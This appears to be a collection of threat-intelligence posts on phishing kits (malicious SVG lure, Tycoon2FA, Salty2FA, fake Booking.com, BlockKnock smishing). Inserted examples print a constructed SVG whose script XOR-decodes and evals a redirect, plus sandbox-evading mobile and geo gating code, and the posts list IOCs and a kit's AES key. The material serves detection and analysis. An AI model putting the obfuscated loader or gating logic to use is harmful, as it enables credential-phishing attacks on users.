🚨 Malicious SVG Leads to Microsoft-Themed #PhishKit.
⚠️ We observed a #phishing campaign that began with testing activity on September 10 and scaled into full spam activity by September 15. A legitimate domain was abused to host a malicious SVG disguised as a PDF. Attackers hide redirects and scripts inside images to bypass controls and social-engineer users into phishing flows.

🎯 The infrastructure behind this case is structured much like a #PhaaS framework: attackers rely on robust, scalable models for mass credential harvesting, a pattern that is now standard across the phishing ecosystem.

For enterprises, the risks are clear: blind spots in monitoring, delayed detection and response, and an increased risk of credential theft or data breach.

👨‍💻 When opened in a browser, the SVG displays a fake “protected document” message and redirects the user through several phishing domains. The chain includes Microsoft-themed lures such as:
🔹 loginmicrosft365[.]powerappsportals[.]com
🔹 loginmicr0sft0nlineofy[.]52632651246148569845521065[.]cc

❗️ The final phishing page mimics a Microsoft login and uses a #Cloudflare Turnstile widget to appear legitimate.

Unlike raster image formats, SVG is an XML document: it can carry inline <script> elements and hyperlinks, so a file that looks like an image can run JavaScript as soon as a browser renders it. Here the redirect was produced by a script acting as an XOR decoder, which rebuilt the redirect code from an encoded string and executed it via eval.
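To show what that decoder-plus-eval pattern looks like and how an analyst recovers the redirect target without executing anything, here is an added example (not code from the ANY.RUN post or from the campaign). The SVG, the XOR key "k3y", the redirect JavaScript and the domain login.example.invalid are all constructed for this demo; the kit's real payload is only described, not reproduced, in the post.

```javascript
// Added example: a minimal SVG carrying an XOR-obfuscated redirect, and a
// static decoder that recovers the redirect target without running the script.
// Everything below (key, domain, SVG text) is constructed, not a campaign artefact.

// Repeating-key XOR to lowercase hex, the way a stager would prepare its blob.
function xorEncodeHex(plain, key) {
  let out = '';
  for (let i = 0; i < plain.length; i++) {
    const b = plain.charCodeAt(i) ^ key.charCodeAt(i % key.length);
    out += b.toString(16).padStart(2, '0');
  }
  return out;
}

// Inverse of xorEncodeHex.
function xorDecodeHex(hex, key) {
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16) ^ key.charCodeAt((i / 2) % key.length));
  }
  return out;
}

// The hidden redirect that the SVG would eval() once opened in a browser.
const REDIRECT_JS = 'window.location.replace("https://login.example.invalid/protected/");';
const XOR_KEY = 'k3y';

// Constructed sample: "protected document" lure plus an inline <script> that
// XOR-decodes the hex blob and hands the result to eval (never do this).
const SAMPLE_SVG = `<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400">
  <text x="40" y="200" font-size="24">This document is protected. Please wait...</text>
  <script type="text/javascript"><![CDATA[
    var k = "${XOR_KEY}";
    var h = "${xorEncodeHex(REDIRECT_JS, XOR_KEY)}";
    var s = "";
    for (var i = 0; i < h.length; i += 2) {
      s += String.fromCharCode(parseInt(h.substr(i, 2), 16) ^ k.charCodeAt((i / 2) % k.length));
    }
    eval(s);
  ]]></script>
</svg>`;

// Analyst side: pull every <script> body out of the SVG text with a regex
// (no DOM, no execution) and strip the CDATA wrapper.
function extractScripts(svgText) {
  const re = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  const bodies = [];
  let m;
  while ((m = re.exec(svgText)) !== null) {
    bodies.push(m[1].replace(/<!\[CDATA\[|\]\]>/g, ''));
  }
  return bodies;
}

// Heuristic decoder: long quoted hex strings are candidate payloads, short
// quoted string assignments are candidate keys; try every pair and keep any
// decoding that yields a URL. Also records whether eval() is present at all.
function analyseSvg(svgText) {
  const findings = [];
  for (const body of extractScripts(svgText)) {
    const usesEval = /\beval\s*\(/.test(body);
    const hexBlobs = [...body.matchAll(/"([0-9a-fA-F]{16,})"/g)].map(x => x[1]);
    const keys = [...body.matchAll(/var\s+\w+\s*=\s*"([^"]{1,32})"/g)]
      .map(x => x[1])
      .filter(k => !/^[0-9a-fA-F]{16,}$/.test(k));
    for (const hex of hexBlobs) {
      for (const key of keys) {
        const decoded = xorDecodeHex(hex, key);
        const url = decoded.match(/https?:\/\/[^\s"']+/);
        if (url) findings.push({ usesEval, key, decoded, redirectTo: url[0] });
      }
    }
  }
  return findings;
}

module.exports = { xorEncodeHex, xorDecodeHex, extractScripts, analyseSvg, SAMPLE_SVG, REDIRECT_JS };
```

Run it with node and call analyseSvg(SAMPLE_SVG): the redirect URL comes back as a string, so the domain can go straight into a blocklist or a TI Lookup query without the SVG ever touching a browser. Real samples vary the decoder (split strings, charCode arrays, nested layers), so treat the regexes as a starting point and fall back to the sandbox when static decoding fails.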

🎯 For SOC analysts, being able to trace every redirect step and uncover hidden payloads is critical to investigating phishing campaigns. See execution on a live system and collect #IOCs:
https://app.any.run/tasks/78f68113-7e05-44fc-968f-811c6a84463e?utm_source=mastodon&utm_medium=post&utm_campaign=malicious_svg&utm_content=linktoservice&utm_term=160925

For CISOs, the critical takeaway is that attackers exploit trusted platforms and brand impersonation to bypass defenses, directly threatening business resilience and user trust.

🔍 Use these TI Lookup search queries to expand visibility and enrich #IOCs with actionable threat context.
Suspicious SVG downloads:
🔹 https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=malicious_svg&utm_content=linktoti&utm_term=160925#%7B%2522query%2522:%2522commandLine:%255C%2522Downloads%255C%255C%255C%255C*.svg%255C%2522%2522,%2522dateRange%2522:180%7D

Microsoft-themed phishing domains:
🔹 https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=malicious_svg&utm_content=linktoti&utm_term=160925#%7B%2522query%2522:%2522domainName:%255C%2522microsoft.*.*%255C%2522%2522,%2522dateRange%2522:180%7D
🔹 https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=malicious_svg&utm_content=linktoti&utm_term=160925#%257B%2522query%2522:%2522domainName:%255C%2522%255Eloginmicr?sft*.cc$%255C%2522%2522,%2522dateRange%2522:180%257D

IOCs:
Revised _payment_and_Benefitschart.pdf______-.svg
A7184bef39523bef32683ef7af440a5b2235e83e7fb83c6b7ee5f08286731892

Strengthen resilience and protect critical assets through proactive security with #ANYRUN 🚀

#cybersecurity #infosec

🚨 #Salty2FA is a new #phishkit linked to #Storm1575.
Active since June, it goes beyond stealing credentials by also bypassing 2FA. Using a distinctive domain pattern and a multi-stage chain, it targets finance, energy, telecom and more.

Read analysis: https://any.run/cybersecurity-blog/salty2fa-technical-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=salty2fa_analysis&utm_term=050925&utm_content=linktoblog

#cybersecurity #infosec

🪝 Since 2023, #Tycoon2FA has become the leading #phishing-as-a-service platform. As a low-cost #AiTM #phishkit, it lets threat actors steal user credentials and session cookies to bypass #MFA.

Learn more and see attack analysis: https://any.run/malware-trends/tycoon/?utm_source=mastodon&utm_medium=post&utm_campaign=tycoon&utm_content=linktomtt&utm_term=270825

#cybersecurity #infosec

🚨 #Salty2FA is a new #phishkit from #Storm1575 that has been evading detection since June

🎯 Targets finance, energy, and telecom companies in the US & EU
🪝 Steals creds and bypasses multiple 2FA methods

Read analysis of its attack chain 👇
https://any.run/cybersecurity-blog/salty2fa-technical-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=salty2fa_analysis&utm_term=190825&utm_content=linktoblog

#cybersecurity #infosec

Salty 2FA: Undetected PhaaS from Storm-1575 Hitting US and EU Industries  - ANY.RUN's Cybersecurity Blog

Dive deeper into malware analysis of a PhaaS framework discovered by ANY.RUN's experts: Salty2FA, targeting industries in the USA and EU.

ANY.RUN's Cybersecurity Blog

🪝 Since 2023, #Tycoon2FA has become the leading #phishing-as-a-service platform.

As a low-cost #AiTM #phishkit, it lets threat actors steal user credentials from numerous companies.

👨‍💻 Learn more and see attack analysis: https://any.run/malware-trends/tycoon/?utm_source=mastodon&utm_medium=post&utm_campaign=tycoon&utm_content=linktomtt&utm_term=270525
#cybersecurity #infosec

Evolution of Tycoon 2FA Defense Evasion Mechanisms

Explore a technical analysis of all the evasion mechanisms employed by the Tycoon 2FA phishing kit to beat detection systems.

ANY.RUN's Cybersecurity Blog

⚠️ #Tycoon2FA is a rapidly evolving #phishkit bypassing 2FA on M365 & Gmail
🔹 Multi-stage execution chain
🔹 Dynamic code generation & #obfuscation for stealth
🔹 Browser fingerprinting for targeted execution

Analysis of 27 observed evasion techniques👇
https://any.run/cybersecurity-blog/tycoon2fa-evasion-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=tycoon2fa_analysis&utm_content=linktoblog&utm_term=150525

#cybersecurity #infosec


🪝 #Tycoon2FA is a #phishkit widely used to steal employee credentials across dozens of industries.

We've documented the evolution of its evasion mechanisms over the past 6 months.

Discover analysis of 27 techniques found in the latest attacks 👇
https://any.run/cybersecurity-blog/tycoon2fa-evasion-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=tycoon2fa_analysis&utm_content=linktoblog&utm_term=130525

#infosec #cybersecurity


🚨 Fake Booking.com phishing pages used to deliver malware and steal data
⚠️ Attackers use #cybersquatting, mimicking the Booking.com website to create legitimate-looking phishing pages that trick users into performing malicious actions.
Leveraging #ANYRUN's interactivity, security professionals can follow the entire infection chain and gather #IOCs.

👨‍💻 Case 1: The user is instructed to open the Run tool by pressing Win + R, then Ctrl + V to paste the script, and hit Enter. This sequence of actions executes a #malicious script that downloads and runs malware, in this case, #XWorm.
Take a look at the analysis: https://app.any.run/tasks/61fd06c8-2332-450d-b44b-091fe5094335/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice

🔍 TI Lookup request to find domains, IPs, and analysis sessions related to this campaign:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522domainName:%255C%2522mktoresp.com%255C%2522%2520AND%2520domainName:%255C%2522booking.*.%255C%2522%2522,%2522dateRange%2522:30%7D%20%20

🎯 Use this search query to find more examples of this fake #CAPTCHA technique and enhance your organization's security response:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522commandLine:%5C%2522

👨‍💻 Case 2: In this scenario, threat actors aim to steal victims’ banking information. It’s a typical phishing site that mimics the Booking.com website and, after a few steps, prompts users to enter their card details to ‘verify’ their stay.
See example: https://app.any.run/tasks/87c49110-90ff-4833-8f65-af87e49fcc8d/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice

📌 A key domain in this campaign, iili[.]io, was also used by the #Tycoon2FA #phishkit.
🔍 Use this TI Lookup query to find more examples:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522domainName:%255C%2522bzib.nelreports.net%255C%2522%2520AND%2520domainName:%255C%2522xpaywalletcdn.azureedge.net%255C%2522%2520AND%2520domainName:%255C%2522cdnjs.cloudflare.com%255C%2522%2520AND%2520domainName:%255C%2522xpaycdn.azureedge.net%255C%2522%2520AND%2520domainName:%255C%2522iili.io%255C%2522%2522,%2522dateRange%2522:180%7D%20

Investigate the latest #malware and #phishing attacks with #ANYRUN 🚀

#cybersecurity #infosec

Analysis guestitems-request.com Malicious activity - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

🚨 #SMiShing phishkit targets victims in the US with fake parking payments (1/2 🧵)
⚠️ Media reports have highlighted widespread cases of parking payment fraud across the US, Canada, the UK, and other countries. #Phishing threats targeting smartphones are among the most dangerous scams in today's threat landscape.

Because the kit checks for distinctive features of mobile browsers, this type of phishing may not work at all in a desktop environment.

We’ve analyzed how this #phishkit, which we named BlockKnock, operates using the ANYRUN Interactive Sandbox.

📌 Setting the external IP to the United States and adjusting the browser to match the screen resolution of an iPhone 14 Pro Max successfully bypassed the checks, revealing the phishing page content. Use ANYRUN’s interactive environment for targeted investigations: enable residential proxies and use browser dev tools for in-depth analysis.

Take a look at the analysis: https://app.any.run/tasks/951d75e9-4d90-40f5-90cd-bf24dc5b6a69/?utm_source=mastodon&utm_medium=post&utm_campaign=parking_smishing&utm_content=linktoservice&utm_term=030225
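The post says the page only rendered once the sandbox looked like a US-based iPhone 14 Pro Max. As an added example (not BlockKnock's own code, whose exact checks the post does not publish), here is a reconstruction of the kind of client-side gate such kits run, together with the environment profile an analyst sets to pass it. The signals inspected (user agent, screen shape and size, touch support, visitor country) and the "US only" allow-list are assumptions for the demo; the 430x932 CSS-pixel viewport is the published iPhone 14 Pro Max size.

```javascript
// Added example: mobile/geo gating of the kind described for the BlockKnock
// smishing page, plus the analyst-side profile that satisfies it. Which
// signals the real kit inspects is not stated in the post; these are assumptions.

// Screen profile the post says defeated the checks (430x932 CSS px, DPR 3).
const IPHONE_14_PRO_MAX = { width: 430, height: 932, dpr: 3 };

// Typical kit heuristics: phone UA, portrait orientation, narrow screen, touch.
function looksLikeMobile(env) {
  const ua = env.userAgent || '';
  const uaMobile = /iPhone|Android.+Mobile/i.test(ua);
  const portrait = env.screen.height > env.screen.width;
  const phoneSized = env.screen.width <= 500;
  const touch = (env.maxTouchPoints || 0) > 0;
  return uaMobile && portrait && phoneSized && touch;
}

// Decide whether to serve the real phishing content or a harmless decoy.
// countryCode stands in for whatever the kit derives from the visitor IP.
function gateContent(env, countryCode, allowedCountries = ['US']) {
  if (!allowedCountries.includes(countryCode)) {
    return { show: false, reason: 'geo' };
  }
  if (!looksLikeMobile(env)) {
    return { show: false, reason: 'not-mobile' };
  }
  return { show: true, reason: 'ok' };
}

// Constructed environments: a default sandbox desktop and the profile the
// analyst dialled in (residential US exit, iPhone-sized viewport, touch UA).
const DESKTOP_ENV = {
  userAgent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0 Safari/537.36',
  screen: { width: 1920, height: 1080 },
  maxTouchPoints: 0,
};

const ANALYST_IPHONE_ENV = {
  userAgent: 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 Mobile/15E148 Safari/604.1',
  screen: { width: IPHONE_14_PRO_MAX.width, height: IPHONE_14_PRO_MAX.height },
  maxTouchPoints: 5,
};

module.exports = { IPHONE_14_PRO_MAX, looksLikeMobile, gateContent, DESKTOP_ENV, ANALYST_IPHONE_ENV };
```

The practical point: a detonation from a desktop profile outside the target country returns a blank or decoy page and looks benign, so a negative sandbox result is not evidence the URL is clean. Re-run with the mobile profile and a residential exit in the targeted country before closing the ticket.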

The phishing page engine communicates with the #C2 server via the WebSocket protocol using the following fields:
⤴️ Client request
action: Client message type
uuid: Current session identifier
data: Client-side JSON request encrypted using AES-CBC and encoded in #Base64
siteCode: Phishing page type

⤵️ Server response
type: Server message type
data: Server-side JSON response encrypted using AES-CBC and encoded in Base64

AES key: bda1ba0338a0de9203b8f80fe81d9fd4

#cybersecurity #infosec

Analysis https://mvppw.loan/pay Malicious activity - Interactive analysis ANY.RUN